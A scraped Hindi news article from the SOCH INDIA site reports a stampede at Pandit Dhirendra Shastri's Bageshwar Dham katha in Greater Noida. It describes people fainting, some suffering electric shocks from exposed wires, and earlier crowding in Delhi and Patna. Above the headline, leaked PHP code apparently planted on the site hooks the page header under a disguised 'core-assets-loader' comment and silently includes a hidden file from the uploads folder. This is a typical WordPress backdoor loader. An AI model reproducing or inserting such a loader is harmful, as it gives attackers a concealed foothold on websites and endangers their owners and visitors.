add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Bageshwar Dham: ग्रेटर नोएडा में पंडित धीरेंद्र शास्त्री की कथा में मची भगदड़, बेहोश होकर गिरे लोग, कईयों को लगा करंट – SOCH INDIA
Menu

देश
Bageshwar Dham: ग्रेटर नोएडा में पंडित धीरेंद्र शास्त्री की कथा में मची भगदड़, बेहोश होकर गिरे लोग, कईयों को लगा करंट

nobanner

देश की राजधानी दिल्ली से सटे ग्रेटर नोएडा में चल रही बागेश्वर धाम के पंडित धीरेंद्र शास्त्री की कथा से भगदड़ की खबर आ रही है. बताया जा रहा है कि बुधवार को कथा में उमड़ी भक्तों की भारी भीड़ बेकाबू हो गई. इस दौरान मची भगदड़ में कई लोग बेहोश होकर गिर गए. जबकि कुछ लोगों को बाहर रखे नंगे तारों से करेंट भी लग गया. हालात ऐसे बने कि मौके पर लोगों की मदद के लिए कई एंबुलेंस बुलानी पड़ी.

इससे पहले दिल्ली के रामलीला मैदान में आयोजित हनुमंत कथा में भगदड़ के हालात हो गए थे. उस वक्त भी स्थिति यह हुई कि 11 बजे से पहले ही पूरा आयोजन स्थल लोगों से खचा-खच भर गया और स्थल के बाहर बनाए गए प्रवेश द्वार समेत स्थल के चारों तरफ लाखों लोग खड़े हो गए. भगदड़ की स्थिति देख आयोजको को श्रद्धालुओं से अपील करनी पड़ी कि वे सभी घर बैठकर टीवी पर कथा सुनें. पंडाल में भारी भीड़ है. यहां न आएं.

जानकारी के मुताबिक, दिल्ली में कथा स्थल पर सिर्फ 70 हजार लोगों के ही बैठने की व्यवस्था थी, लेकिन लाखों लोग इसमें शामिल होने रामलीला मैदान पहुंच गए. कथा स्थल पर मौजूद भीड़ को संभाल पाना सुरक्षाकर्मी के भी बस की बात नहीं रही. हालांकि बाबा के भक्तों पर इसका कोई असर नहीं पड़ा. लगातार कथा में भक्तों की भीड़ उमड़ती रही. इससे पहले पटना में भी हुए आयोजन में कथा के पहले दिन ही आयोजन स्थल पर रिकॉर्ड 10 लाख से भी ज्यादा लोग स्थल पर पहुंचे थे.